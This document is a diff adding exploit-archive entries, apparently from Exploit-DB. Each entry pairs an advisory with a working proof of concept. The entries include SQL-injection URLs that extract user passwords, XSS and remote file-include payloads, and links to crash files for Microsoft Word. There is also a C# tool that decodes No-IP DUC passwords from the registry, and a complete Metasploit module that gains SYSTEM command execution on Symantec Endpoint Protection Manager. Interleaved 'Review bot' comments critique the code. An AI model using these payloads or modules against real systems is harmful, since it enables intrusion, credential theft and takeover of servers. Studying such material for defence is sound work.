Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/pages/index.php?r=&page_id=-74+union+select+1,1,1,convert(concat_ws(0x2F2A2A2F,version(),current_user,database())+using+latin1),1,1--

11
platforms/php/webapps/31938.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/29808/info
KEIL Software's photokorn is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects photokorn 1.542; other versions may be vulnerable as well.
The following proof-of-concept URI is available:
http://www.example.com/[path]/index.php?action=[SQL]

10
platforms/php/webapps/31939.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/29817/info
vBulletin is prone to a cross-site scripting vulnerability that occurs in the MCP (moderation control panel) because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
vBulletin 3.7.1 PL1 and 3.6.10 PL1 are vulnerable; prior versions may also be affected.
http://www.example.com/vB3/modcp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
http://www.example.com/vB3/modcp/index.php?redirect={XSS}

View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/29849/info
GL-SH Deaf Forum is prone to a cross-site scripting vulnerability and an arbitrary-file-upload vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The attacker can exploit the file-upload issue to execute arbitrary code in the context of the webserver.
GL-SH Deaf Forum 6.5.5 is vulnerable; prior versions may also be affected.
<form action="http://[URL]/[Forum path]/search.php" method="post">
<tr><td class=g>XSS: <small></td><tr>
"<SCRIPT>alert(/BugReport.ir-XSS/.source)</SCRIPT>
<br><tr><td class=g><INPUT TYPE="text" class="txt" NAME="search" SIZE="30" MAXLENGTH="100"><br/>
<tr><td class=g><INPUT TYPE="RADIO" checked NAME="type" VALUE="themen">&nbsp;search only in topics</td></tr>
<tr><td class=g><INPUT TYPE="RADIO" NAME="type" VALUE="beitraege">&nbsp;search in topics and answers</td></tr>
<INPUT TYPE="SUBMIT" class="btn" NAME="submit" VALUE="submit"></td></tr>
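Review bot: the description names two issues, cross-site scripting and arbitrary file upload, but the hunk only carries a search-form fragment for the XSS; either add the file-upload details or drop that claim from the description. The fragment itself is malformed: the `<form>` opened on the first line is never closed, the `<tr>`/`<td>` rows have no enclosing `<table>`, and the `"<SCRIPT>alert(...)</SCRIPT>` line sits outside any element, so it is unclear whether it is meant to be the value submitted in the `search` field.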

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/29856/info
PHPAuction is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/profile.php?user_id=1&auction_id=-2+union+select+concat_ws(0x2F2A2A2F,nick,password,email)+from+PHPAUCTION_users+limit+1,1/*

10
platforms/php/webapps/31945.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/29865/info
PEGames is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/path/template2.php?sitetitle=[XSS]
http://www.example.com/path/template2.php?sitenav=[XSS]
http://www.example.com/path/template2.php?sitemain=[XSS]
http://www.example.com/path/template2.php?sitealt=[XSS]

12
platforms/php/webapps/31946.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/29868/info
IDMOS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
IDMOS 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/path/administrator/admin.php?site_absolute_path=[SHELL]
http://www.example.com/path/administrator/menu_operation.php?site_absolute_path=[SHELL]
http://www.example.com/path/administrator/template_add.php?site_absolute_path=[SHELL]
http://www.example.com/path/administrator/template_operation.php?site_absolute_path=[SHELL]

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29869/info
The EXP Shop component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
EXP Shop 1.0 is vulnerable; previous versions may also be affected.
http://www.example.com/index.php?option=com_expshop&page=show_payment&catid=-2 UNION SELECT @@version,@@version,concat(username,0x3a,password) FROM jos_users--

12
platforms/windows/dos/31934.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/29769/info
Microsoft Word is prone to a remote memory-corruption vulnerability.
An attacker could exploit this issue by enticing a victim to open and interact with malicious Word files.
Successfully exploiting this issue will corrupt memory and crash the application. Given the nature of this issue, attackers may also be able to execute arbitrary code in the context of the currently logged-in user.
http://www.exploit-db.com/sploits/31934-1.doc
http://www.exploit-db.com/sploits/31934-2.doc
http://www.exploit-db.com/sploits/31934-3.doc
http://www.exploit-db.com/sploits/31934-4.doc
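Review bot: the entry lists four crash documents but states neither the affected Word versions nor what distinguishes the four samples, so a reader cannot tell whether they exercise one bug or four; add the tested version and a short per-file description, as the other entries in this commit do (`Classic FTP 1.02 for Microsoft Windows is vulnerable; other versions may also be affected.`).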

View file

@ -0,0 +1,78 @@
source: http://www.securityfocus.com/bid/29758/info
The DUC application for No-IP is prone to a local information-disclosure vulnerability when it is running on Microsoft Windows.
Successfully exploiting this issue allows attackers to obtain potentially sensitive information that may aid in further attacks.
/*
* DUC NO-IP Local Password Information Disclosure
* Author(s): Charalambous Glafkos
* George Nicolaou
* Date: March 11, 2008
* Site: http://www.astalavista.com
* Mail: glafkos@astalavista.com
* ishtus@astalavista.com
*
* Synopsis: DUC NO-IP is prone to an information disclosure vulnerability due to a design error.
* Attackers can exploit this issue to obtain sensitive information including tray password,
* web username, password and hostnames that may lead to further attacks.
*
* Note: Vendor has been notified long time ago confirming a design error.
* Vendor site: http://www.no-ip.com
*
*/
using System;
using System.Text;
using System.IO;
using Microsoft.Win32;
namespace getRegistryValue
{
class getValue
{
static void Main()
{
getValue details = new getValue();
String strDUC = details.getDUC();
Console.WriteLine("\nDUC NO-IP Password Decoder v1.2");
Console.WriteLine("Author: Charalambous Glafkos");
Console.WriteLine("Bugs: glafkos@astalavista.com");
Console.WriteLine(strDUC);
FileInfo t = new FileInfo("no-ip.txt");
StreamWriter Tex = t.CreateText();
Tex.WriteLine(strDUC);
Tex.Write(Tex.NewLine);
Tex.Close();
Console.WriteLine("\nThe file named no-ip.txt is created\n");
}
private string getDUC()
{
RegistryKey ducKey = Registry.LocalMachine;
ducKey = ducKey.OpenSubKey(@"SOFTWARE\Vitalwerks\DUC", false);
String TrayPassword = DecodeBytes(ducKey.GetValue("TrayPassword").ToString());
String Username = ducKey.GetValue("Username").ToString();
String Password = DecodeBytes(ducKey.GetValue("Password").ToString());
String Hostnames = ducKey.GetValue("Hosts").ToString();
String strDUC = "\nTrayPassword: " + TrayPassword
+ "\nUsername: " + Username
+ "\nPassword: " + Password
+ "\nHostnames: " + Hostnames;
return strDUC;
}
public static string DecodeBytes(String encryptedData)
{
Byte[] toDecodeByte = Convert.FromBase64String(encryptedData);
System.Text.UTF8Encoding encoder = new System.Text.UTF8Encoding();
System.Text.Decoder utf8Decode = encoder.GetDecoder();
int charCount = utf8Decode.GetCharCount(toDecodeByte, 0, toDecodeByte.Length);
Char[] decodedChar = new char[charCount];
utf8Decode.GetChars(toDecodeByte, 0, toDecodeByte.Length, decodedChar, 0);
String result = new String(decodedChar);
return (new string(decodedChar));
}
}
}
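Review bot: `getDUC` dereferences the result of `OpenSubKey(@"SOFTWARE\Vitalwerks\DUC", false)` without a null check, so on a machine where the key is absent the tool dies with a `NullReferenceException` instead of a readable message; each `GetValue(...).ToString()` has the same problem when a value is missing. In `DecodeBytes` the line `String result = new String(decodedChar);` is unused and the whole body reduces to `Encoding.UTF8.GetString(Convert.FromBase64String(encryptedData))`; the `StreamWriter` in `Main` should sit in a `using` block so `no-ip.txt` is closed if a write fails. The code also pins down the "design error" the advisory alludes to: `TrayPassword` and `Password` are stored merely Base64-encoded under HKLM, which is the detail a defender reading this entry needs and which the description should state plainly.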

123
platforms/windows/remote/31917.rb Executable file
View file

@ -0,0 +1,123 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include REXML
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Symantec Endpoint Protection Manager Remote Command Execution',
'Description' => %q{
This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager
versions 11.0, 12.0 and 12.1. When supplying a specially crafted XXE request an attacker
can reach SQL injection affected components. As xp_cmdshell is enabled in the included
database instance, it's possible to execute arbitrary system commands on the remote system
with SYSTEM privileges.
},
'Author' =>
[
'Stefan Viehbock', # Discovery
'Chris Graham', # PoC exploit
'xistence <xistence[at]0x90.nl>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-5014' ],
[ 'CVE', '2013-5015' ],
[ 'EDB', '31853'],
[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ]
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'Targets' =>
[
['Windows VBS Stager', {}]
],
'Privileged' => true,
'DisclosureDate' => 'Feb 24 2014',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(9090),
OptString.new('TARGETURI', [true, 'The base path', '/'])
], self.class)
end
def check
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
})
if res && res.code == 200 && res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995 - 2013 Symantec Corporation/
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
print_status("#{peer} - Sending payload")
# Execute the cmdstager, max length of the commands is ~3950
execute_cmdstager({:linemax => 3950})
end
def execute_command(cmd, opts = {})
# Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML.
command = "0x#{Rex::Text.to_hex("cmd /c #{cmd}", '')}"
# Generate random 'xx032xxxx' sequence number.
seqnum = "#{rand_text_numeric(2)}032#{rand_text_numeric(4)}"
soap = soap_request(seqnum, command)
post_data = Rex::MIME::Message.new
post_data.add_part(soap, "text/xml", nil, "form-data; name=\"Content\"")
xxe = post_data.to_s
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
'method' => 'POST',
'vars_get' => { 'ActionType' => 'ConsoleLog' },
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => xxe,
})
if res and res.body !~ /ResponseCode/
fail_with(Failure::Unknown, "#{peer} - Something went wrong.")
end
end
def soap_request(seqnum, command)
randpayload = rand_text_alpha(8+rand(8))
randxxe = rand_text_alpha(8+rand(8))
entity = "<!ENTITY #{randpayload} SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?"
entity << "ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >"
xml = Document.new
xml.add(DocType.new('sepm', "[ METASPLOIT ]"))
xml.add_element("Request")
xxe = xml.root.add_element(randxxe)
xxe.text = "PAYLOAD"
xml_s = xml.to_s
xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding
xml_s.gsub!(/PAYLOAD/, "&#{randpayload};") # To avoid html encoding
xml_s
end
end
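Review bot: in `execute_command` the guard `if res and res.body !~ /ResponseCode/` treats a `nil` response (connection refused, timeout) as success, so the stager keeps sending chunks against a dead target; fail with `Failure::Unreachable` when `res` is nil before checking the body. `require 'msf/core/exploit/powershell'` is never used (the module mixes in `CmdStagerVBS`, not the PowerShell mixin) and `include REXML` pulls the whole REXML namespace into the class; `REXML::Document` and `REXML::DocType` at the two call sites would be cleaner. The `check` method keys on the copyright string `1995 - 2013 Symantec Corporation`, which stops matching on the next year's build; matching the product name alone and returning `CheckCode::Detected` is more robust. Finally, `http//metasploit.com/download` in the header comment is missing its colon.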